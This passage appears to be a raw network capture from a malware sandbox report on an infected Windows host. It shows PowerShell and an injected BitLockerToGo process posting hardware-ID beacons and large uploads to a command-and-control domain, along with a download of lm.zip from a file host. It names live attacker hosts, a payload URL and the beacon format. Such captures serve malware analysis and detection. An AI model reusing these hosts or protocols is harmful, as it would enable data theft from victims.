2024-07-27 06:54:36 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: callosallsaospz.shop
2024-07-27 06:54:36 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 06:54:36 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-07-27 06:54:37 UTC	820	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0g3hljf525u1kgeo1hceuhtp1h; expires=Wed, 20-Nov-2024 00:41:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eisObH1XnlfAIsIKcoylH9Uy05dHY3%2FAVp3V%2FMLWx7Umd2xk0%2BInbNN1A%2Bof7OXHosOhKW4raDwA%2BLeOuTy%2BHdV9ZPjzX%2FptuP%2Bt6P5HZbpN7zMnVXmYxQzc%2FSAd0Jra9udIZrwRAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab81678f44372-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:37 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 06:54:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50729	31.14.70.245	443	1696	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:37 UTC	196	OUT	GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: store4.gofile.io
2024-07-27 06:54:38 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.27.0 Date: Sat, 27 Jul 2024 06:54:37 GMT Content-Type: application/zip Content-Length: 528925 Connection: close Accept-Ranges: bytes Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range Content-Disposition: attachment; filename*=UTF-8''lm.zip Last-Modified: Sat, 20 Jul 2024 15:36:00 GMT
2024-07-27 06:54:38 UTC	512	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 15 7b f3 58 c4 92 38 a6 85 28 05 00 fb 29 05 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1f 2c e0 d3 60 9c e8 00 00 00 00 5e b9 dc 29 05 00 b2 c8 30 94 0e 17 00 00 00 02 94 0e 17 00 00 00 e2 f0 92 75 77 e0 85 72 c2 bd 55 09 ce ca ca 84 3b 3f 3f 0e c2 8b 6b 30 14 f1 48 5f 7b 5a 41 91 0d 98 6b bd 94 61 e5 1b 0f c7 0d e8 65 1b 1e 86 14 20 20 20 20 20 de 75 6a 5f b1 2f fb 26 7b 45 0a be 05 ce 79 a3 39 b7 9a 41 a5 20 83 99 3c e6 22 4c 5c 50 75 cc ac e5 bf bb 2b 64 04 96 20 44 f6 f2 9e fe a4 c7 03 8b c5 fc 9a db 81 f9 b6 56 87 3e 30 c0 10 f4 29 a7 48 41 3b 11 24 9d e8 5a 82 2f 28 ea db 56 e9 10 b5 2d be c2 89 6f 5a b4 5b 18 da 65 94 95 19 65 cb 0e 2a 07 ab d8 36 9d 69 45 5b bd d9 93 47 b7 30 36 34 d4 e2 c4 5e 50 b0 df 6a 5e a1 fd 2a Data Ascii: PK{X8()data.bin,`^)0uwrU;??k0H_{ZAkae uj_/&{Ey9A <"L\Pu+d DV>0)HA;$Z/(V-oZ[ee6iE[G064^Pj^
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: 27 7d 90 93 89 da 18 99 b1 94 27 99 fd a0 93 e7 48 02 6b 2d bf a3 8c cf 47 1d 47 18 b1 7d d1 23 48 8c 6f 8f 14 00 b5 e3 85 16 01 43 9f ef 87 c1 f8 68 45 38 ef 5c 98 95 fd 4e 04 cc e7 73 c6 fe a3 87 fb 83 4e 0e 0e 5e 87 7c 3a 7b fc f9 c6 40 d8 2e d9 11 c1 98 1e c0 6c 01 91 60 e7 7b 11 43 ce 3f b8 b4 aa 26 76 18 4e 79 ac 1a 34 88 25 f7 a1 16 f3 5c 88 f8 d1 c8 c3 19 7f 9b 71 cb f2 f2 f2 f2 f2 f2 f2 f2 f0 f1 f1 f1 ed ee ee ee ee ee ee ee ec 99 58 af a5 d8 11 da 20 4f e9 7e 4b 0f 70 94 c2 78 d6 ba de 37 19 00 6d 11 92 09 11 8d 01 47 a5 36 46 65 a2 bf 75 a7 f3 1d 24 c7 73 1a 5b dd fb ff 13 f5 3b d7 71 8e 98 2a cc ac 29 7c 76 26 e1 ea 12 0c 30 3a 30 8f 15 4d 3a a3 21 ff 92 36 82 b3 00 37 e1 ab 75 bb d9 ed d8 8f f9 21 c4 33 14 d9 8d ae 44 8e 10 09 58 e8 1d a1 b5 Data Ascii: '}'Hk-GG}#HoChE8\NsN^\|:{@.l`{C?&vNy4%\qX O~Kpx7mG6Feu$s[;q*)\|v&0:0M:!67u!3DX
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: af 24 7f ff a8 11 2f 31 d0 dd 50 69 a0 b2 c6 b1 ed 2e ae a6 dd b7 c5 cf 9c 12 39 04 10 4c d5 e5 3a 1d eb fb 06 97 dc 93 15 25 25 62 81 da 82 5a 94 70 f6 94 67 ed 55 5c 3a 9b 40 dc 02 ce c0 22 2a 1f a4 47 f6 56 d3 c0 8f f2 9c 4f b6 f8 94 f5 31 a0 d4 85 3e 8a 20 95 35 69 c6 8f ad 42 5e 48 56 41 db 31 da d4 55 49 bb cb fb b6 d6 3f 1a f2 c3 32 46 15 ad bd 66 51 51 10 1e 41 2e f0 ac ac 53 b9 5e c4 17 fd 47 5e a6 5e c5 68 36 74 62 20 f9 f2 25 b4 01 58 94 71 98 14 86 ad ef 40 84 6a ca 90 2b 3d 86 9b 44 37 ee b0 84 6a dc 84 c0 51 8d d3 61 f8 ff 92 d1 c0 9b 95 36 cf ef 2b 19 05 80 ee 3f d7 a5 27 c9 e8 6b a5 8e de c5 39 89 c1 41 be 2f bd 19 5d 7f 8d 27 76 c6 ab b7 aa e4 9f 05 f5 d8 b4 cd e0 d1 b3 2b 7b 0c c7 e5 f2 4d d8 f6 f9 54 bd 4a f5 e3 0a 21 5a e9 76 4a c6 19 Data Ascii: $/1Pi.9L:%%bZpgU\:@"*GVO1> 5iB^HVA1UI?2FfQQA.S^G^^h6tb %Xq@j+=D7jQa6+?'k9A/]'v+{MTJ!ZvJ
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: dd b2 3e 61 5e 59 f4 fe a7 cb 64 4f af 06 49 5b 21 dd d2 12 6b b1 b0 74 54 58 ea f5 57 7f a7 e9 95 6f 72 39 4a 59 b1 da 34 09 19 46 8a 36 b1 ca 31 5f 02 91 31 6f ee c6 98 2f e4 4e d1 63 a7 74 ef d0 a0 8a 24 dd a7 63 9c 7e d9 1e 22 89 03 84 74 b4 81 be 0a 14 81 d1 b6 b6 fc e3 2e cc ea 56 08 c2 ca 9a 0d 9e 5c a8 af e7 02 d2 39 cb 4e e8 24 58 3a c8 4a b7 81 9b 1d a3 ab f5 71 20 cc df d9 65 a6 6e d7 63 ce bd a4 48 3b 9a 8c 9a 1a 8c cf 4b 6a e2 2e e6 a5 ac d1 38 9e 37 02 18 9c 45 6e 16 a5 48 34 00 2f 2c 7f 18 6f 60 61 c3 63 e5 a1 de 7f 09 36 81 38 41 c2 d4 5b 83 07 64 cb a2 cf bc c0 16 e5 04 f9 86 d6 95 ee 1f 37 1e 18 c8 6b 50 98 ce 9c 7d a0 92 4b 16 50 df 88 0e 68 10 93 3b 8c 17 4b 6b f4 1d 47 19 0f ad 68 78 70 ef da 81 5c 50 75 e1 85 70 af 04 07 b6 1f fc e4 Data Ascii: >a^YdOI[!ktTXWor9JY4F61_1o/Nct$c~"t.V\9N$X:Jq encH;Kj.87EnH4/,o`ac68A[d7kP}KPh;KkGhxp\Pup
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: 00 17 06 b8 0c 9c 9c f8 87 f3 40 ca be 10 75 b5 55 5d 7e 13 de 84 67 8b e8 af 39 c0 22 80 2c 4c eb 09 fa 21 a0 62 54 d7 30 fd 53 f8 21 92 70 71 91 2a 79 43 5b e3 5c 65 ef a8 6e aa 92 76 c1 e1 6b c1 13 76 cc 1f ca 04 ab 1c c6 2c 57 2c b6 df 66 b2 68 b5 6c 8b 54 00 1c 22 7c 26 10 e0 7e 05 de 50 88 cf 4b 7e 5e 9d 6a f1 f0 2e 9c 66 ca 74 51 87 cc 70 0b a7 7a 2c ef 04 d0 7c b8 bc 81 9b 37 f7 75 09 58 a7 e3 e3 80 16 6f 25 3a 84 19 15 18 d8 5f 29 86 a5 66 40 f2 d3 40 0b ed 8d 87 ba cf fb 3a 31 8b 4a dd d9 15 34 f7 8e 8d b0 02 37 0d d9 6e cc d0 aa 51 cc f9 7f 6d 53 a1 4a f6 c8 78 e8 3d d0 a9 62 8b 1c 1b 6c 90 ff 61 b0 56 07 6e e9 bb 2c cf 05 30 00 9a 4f 51 b0 bb ac 2e 3a 3d d4 a3 00 c6 ed 0d 65 a9 c3 a6 56 65 cb c9 07 de 2c 36 da a4 87 c7 d6 1b 73 3a 88 17 5c ab Data Ascii: @uU]~g9",L!bT0S!pq*yC[\envkv,W,fhlT"\|&~PK~^j.ftQpz,\|7uXo%:_)f@@:1J47nQmSJx=blaVn,0OQ.:=eVe,6s:\
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: ee cf 5a 9d 22 b8 98 cd a0 f8 78 46 c4 71 0d d5 e5 08 fd f8 3d bf 4c 7f c1 fe e2 f6 7e 36 6e 1f 5b db f4 b7 0a 85 37 67 fd 8c 70 e0 a7 7f 86 c9 7b be 31 50 e7 9e 6b e0 73 3e 94 09 9d 14 54 39 20 28 6d 03 b6 a3 d3 94 89 52 dc de b4 5a c9 e8 1b f2 96 f4 f0 b0 7d d5 91 e2 34 0e c7 05 3b ea ff e7 08 81 81 82 bd d6 5f d3 4f a1 97 b2 55 ea 70 9c bb 11 15 23 ae b8 83 6f 06 ee 54 9c 27 95 21 94 a5 14 13 f3 29 cf c8 e5 ee 5d 76 dc 9d 06 7a da ff 0f 51 97 e0 e1 a0 0b ef cc 4c f5 1b a4 83 c5 60 48 d5 dc 82 1b 32 5c 3d 5a 03 df 69 a7 94 ad cd b0 0a c9 3a 1c da 87 e0 02 e3 64 88 b2 fb c3 ce c2 21 65 67 ee a2 d3 d2 be 87 5c 47 21 db b8 53 8c 29 9d 5b 62 95 19 26 f2 9d 64 25 bb 00 3c ff 4b c8 01 dd c8 8c a9 b4 47 87 cf 7b b2 b2 04 a1 49 d6 91 87 63 f2 bd 19 99 23 a1 52 Data Ascii: Z"xFq=L~6n[7gp{1Pks>T9 (mRZ}4;_OUp#oT'!)]vzQL`H2\=Zi:d!eg\G!S)[b&d%<KG{Ic#R
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: 9b 09 13 39 5c 5c 64 9f ab f1 3f b6 09 8a 2d bc 4d 0f 4a 6f 9f 88 dd d8 95 aa 8c cc e4 76 8c 81 9d de 39 42 71 ee cd c5 58 cb b0 3c 57 13 8c 89 5a e8 2e 60 17 bc d0 7a 76 4b a5 79 72 cc 16 98 fe fd f1 f2 a3 36 95 dd e8 5d 4b 60 d4 37 b4 bf 2f 1e c3 03 56 cf 5a 82 de d5 66 25 36 5a a2 14 37 a5 36 b4 cb 40 3c 7c 76 c5 a2 87 71 ba 19 73 90 56 0b a5 04 51 d4 aa e0 68 f0 fb 3f 10 a3 ad 97 3a 16 ec 6a 97 a7 e3 83 a3 b9 4a 75 d7 28 b0 07 ee 02 c9 a1 86 65 3e 0b fc df 38 ca 60 05 2e bd 36 c8 b7 bc 06 74 e9 91 cf 50 2f c6 d8 dc 29 f0 43 57 34 ad 01 cb 85 af a6 0a 1e 74 d2 5f 41 70 f1 c8 64 ba f5 73 77 7e c6 ee b3 b9 9e 31 13 67 51 c4 8d 93 cf f9 33 64 bb 53 ea df 91 c1 20 c8 cb e8 75 ea 85 3b 7e 3a 4a 13 52 8e ba a7 da 83 e0 2b 7e 14 43 46 2c d0 ff 53 3c f0 c2 08 Data Ascii: 9\\d?-MJov9BqX<WZ.`zvKyr6]K`7/VZf%6Z76@<\|vqsVQh?:jJu(e>8`.6tP/)CW4t_Apdsw~1gQ3dS u;~:JR+~CF,S<
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: 35 b9 3d ae e8 36 9e 93 e1 f3 a5 4d 25 b8 bc 10 7d bc da a6 8e cf e2 62 c4 0a f4 79 8a 7b 51 7d ed eb f2 55 1c b1 f3 76 9e 53 a7 e8 e0 11 ac 13 e5 d5 36 8d 68 f2 bf 40 59 40 cd 4a 8e 99 f1 88 bb dc e9 f2 85 c0 b6 da da 16 e9 d8 31 08 d4 60 b8 95 27 1d 6d cb d6 09 9d 7d 6a 22 db 89 6d 03 1b e8 b2 16 e8 98 2c 87 c0 49 9d e5 46 55 11 c1 c1 b0 38 ab 79 86 66 3d a5 db 6d 9c f9 b9 87 77 b6 a3 45 7b 5d cb b8 0c 53 11 a5 ba d0 6a a1 65 25 e5 31 e1 1c b5 52 55 5a 2b 0a da db d2 72 e1 6e 5b 74 a1 9b 77 1d da 35 e7 57 8e 16 36 55 b0 7d 7b 4d fc d4 5f fe 6c db 28 d8 b0 d0 7b d3 0a 24 6a c0 9d 72 21 c4 a0 bb e2 41 50 4a b6 0e e0 db a4 fc 94 2a 27 9f fd 62 72 6b 75 b8 54 bb eb 0e b4 ab a9 b6 aa 42 8a 50 77 c5 a2 fc 9a 38 89 99 68 9a e8 b0 23 f9 ad c2 a9 41 50 81 e4 e5 Data Ascii: 5=6M%}by{Q}UvS6h@Y@J1`'m}j"m,IFU8yf=mwE{]Sje%1RUZ+rn[tw5W6U}{M_l({$jr!APJ*'brkuTBPw8h#AP
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: b5 f0 9a a4 71 b4 47 db 05 8d 76 04 b0 1e 89 34 33 9d 71 eb 4d 47 10 37 d1 11 81 44 b3 39 28 51 70 a5 44 0e 0a 37 5a d7 44 78 03 61 1a 21 0b fb 62 85 64 24 f3 1c 64 93 c2 67 2a 48 a4 18 ef e9 f8 f1 5a 41 11 d3 4d 71 4f f8 3c 89 45 bb 37 6b d5 d3 c1 f8 09 0a db 78 17 8b e8 10 f2 4d c6 fb 97 29 a7 6f 33 d2 d2 8d a9 45 d9 72 fe 52 7b 70 eb 2c e9 fb a6 d9 f7 2d 7c 5d a3 94 fd 14 5f 42 a7 31 f1 52 e5 db d4 35 8f 01 39 8a 11 ef 18 9e 0c a7 ab e0 ca 83 62 8a 6a 7b 60 d1 dd 11 b9 4e ee 2b e8 79 72 41 e4 de 95 4c 52 84 0f 5e 77 74 d2 f0 58 5e 39 20 b3 55 7e f1 4b c3 04 ef f8 8f 09 e0 40 31 08 0f 59 f9 df ed 51 83 59 78 48 0c 2e 40 e7 60 eb 97 5f c9 c4 c6 d9 46 c3 6d 1f 50 2f 93 f9 72 7d 42 57 96 1b c0 ea 41 85 c9 f3 36 2a 7e 79 bb e1 19 22 92 47 86 81 ce a6 fa 63 Data Ascii: qGv43qMG7D9(QpD7ZDxa!bd$dgHZAMqO<E7kxM)o3ErR{p,-\|]_B1R59bj{`N+yrALR^wtX^9 U~K@1YQYxH.@`_FmP/r}BWA6~y"Gc
2024-07-27 06:54:38 UTC	4096	IN	Data Raw: 46 94 44 d4 1a bd 3d 25 28 41 89 70 53 b6 3c 25 25 87 79 91 ae c9 a4 55 0a 23 67 fa 87 63 75 7b 9d 41 56 7d 7f 0e 4e 89 bb be d7 da 36 be 6b c3 a1 06 8d f0 93 52 17 4d 10 c9 99 ea 02 e6 50 f9 e5 21 9e 7a ef 7b 14 85 df e2 43 42 e9 89 3e ce 49 11 a4 e9 1a 9b e0 63 7f cf 38 7b c0 30 0b 4d fc c8 36 a5 a1 f7 ef 19 2e 9b c0 9b d0 2a e1 a0 99 2a 24 92 2a 4b b8 b9 af b7 fe 77 cf e1 c2 cc 81 d8 2c 3a b0 ae 03 5d 77 b6 cb 0c f1 65 48 4b ba 80 14 71 91 ae d1 00 d0 b1 96 cb 3a a3 5f 8f 40 b8 5c 01 01 50 23 32 f9 af 96 a9 bb de 1a 18 32 4e 69 af 4a ea 2f 61 0f 18 82 76 e8 02 27 0f a1 33 99 cf e2 7a c7 72 82 55 fc 2d 8a 31 61 85 7c 4f 50 24 40 e5 8f 80 8f b9 e4 4c 85 3e 7f fc 3c df 03 e3 72 0e c4 81 8e b1 72 e3 f8 be 34 52 88 59 35 e9 d8 eb a0 0d 01 54 78 c8 02 bd 1c Data Ascii: FD=%(ApS<%%yU#gcu{AV}N6kRMP!z{CB>Ic8{0M6.*$Kw,:]weHKq:_@\P#22NiJ/av'3zrU-1a\|OP$@L><rr4RY5Tx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50730	188.114.97.3	443	3588	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:38 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1256 Host: callosallsaospz.shop
2024-07-27 06:54:38 UTC	1256	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 06:54:38 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q9calqh965bti8j0o3vr5tpjgh; expires=Wed, 20-Nov-2024 00:41:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f4ObKsNlsClfzMdmDo7XFNgtyBmoLubO%2BzlTAr8axroPzUsXt8jMOtdLoPq7XNP3ngxf8jkQE8lL2MJ5x2knmdSjhc6hWbuUjWXtAXQ%2FPjVB%2FbqCcLSlubMV5yWfjkrHNuMt9AWWWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab821fb960f5b-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:38 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 06:54:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50731	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:38 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:38 UTC	1267	OUT	Data Raw: 63 6b 79 31 31 7a 64 41 4d 36 73 70 70 47 52 49 41 72 4d 71 68 43 46 52 55 30 47 44 55 2b 57 42 4a 34 4c 36 43 68 72 69 39 7a 78 49 42 6c 34 49 38 44 37 56 70 58 4e 74 4a 38 38 77 30 54 48 4f 47 72 2f 33 32 32 75 51 66 61 77 6d 61 59 53 4e 59 5a 44 51 6e 7a 4a 47 2b 6f 62 61 6c 58 37 6f 6e 77 58 2b 71 74 52 57 49 51 68 76 36 61 51 52 66 31 6c 6e 4d 42 42 48 46 75 67 78 36 51 36 63 30 58 73 63 70 63 30 4f 36 6d 42 49 6d 4c 61 67 7a 65 48 69 76 75 31 43 47 6e 64 36 2b 58 77 4f 50 54 62 74 72 4b 54 30 7a 4d 54 6e 37 52 38 47 58 63 38 4f 51 4e 53 58 78 2b 6a 4f 2b 73 61 58 42 72 75 33 54 63 6f 2b 4f 37 55 64 32 4e 54 4e 64 43 31 4a 36 71 44 64 5a 69 37 2f 4c 57 38 75 51 4e 76 65 2f 4a 52 32 6b 47 35 6d 73 39 71 33 2b 6e 6f 2b 58 4f 4c 42 4d 74 65 32 2b 32 6d Data Ascii: cky11zdAM6sppGRIArMqhCFRU0GDU+WBJ4L6Chri9zxIBl4I8D7VpXNtJ88w0THOGr/322uQfawmaYSNYZDQnzJG+obalX7onwX+qtRWIQhv6aQRf1lnMBBHFugx6Q6c0Xscpc0O6mBImLagzeHivu1CGnd6+XwOPTbtrKT0zMTn7R8GXc8OQNSXx+jO+saXBru3Tco+O7Ud2NTNdC1J6qDdZi7/LW8uQNve/JR2kG5ms9q3+no+XOLBMte2+2m
2024-07-27 06:54:39 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:39 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:39 UTC	685	IN	Data Raw: 75 77 32 34 2b 56 64 38 46 69 6b 61 51 6c 59 6a 6c 50 78 63 7a 6a 35 67 33 4e 49 71 5a 62 63 4d 5a 4d 47 30 62 68 6a 61 59 42 67 6e 6e 75 2b 70 6e 72 45 33 58 50 73 6f 6b 61 6e 4b 6f 39 70 52 4a 54 30 75 73 6e 4c 73 52 61 45 43 42 6b 54 50 6c 79 70 4e 36 35 51 6c 73 64 4e 37 77 63 72 38 79 66 56 69 39 35 77 49 49 59 74 62 64 48 75 6f 52 59 43 65 77 69 49 4c 71 68 44 31 2f 50 67 49 33 2b 35 71 77 43 52 54 68 4c 48 49 53 61 79 71 6c 69 2b 62 6c 34 46 32 32 65 52 47 2b 49 6c 61 57 65 33 64 2b 39 56 2f 74 71 4e 49 4b 6e 36 39 67 70 35 46 50 6a 4d 33 53 46 52 35 62 72 73 4b 38 57 4d 52 52 72 42 79 47 6c 35 66 5a 51 5a 6d 4d 7a 59 51 46 6b 73 59 62 30 7a 4f 63 64 77 77 44 6e 66 49 59 6b 4e 34 48 79 70 6e 58 41 6c 7a 36 33 34 51 33 6b 49 6f 46 2f 4e 74 46 4e 63 Data Ascii: uw24+Vd8FikaQlYjlPxczj5g3NIqZbcMZMG0bhjaYBgnnu+pnrE3XPsokanKo9pRJT0usnLsRaECBkTPlypN65QlsdN7wcr8yfVi95wIIYtbdHuoRYCewiILqhD1/PgI3+5qwCRThLHISayqli+bl4F22eRG+IlaWe3d+9V/tqNIKn69gp5FPjM3SFR5brsK8WMRRrByGl5fZQZmMzYQFksYb0zOcdwwDnfIYkN4HypnXAlz634Q3kIoF/NtFNc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50732	188.114.97.3	443	3588	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:39 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569637 Host: callosallsaospz.shop
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: 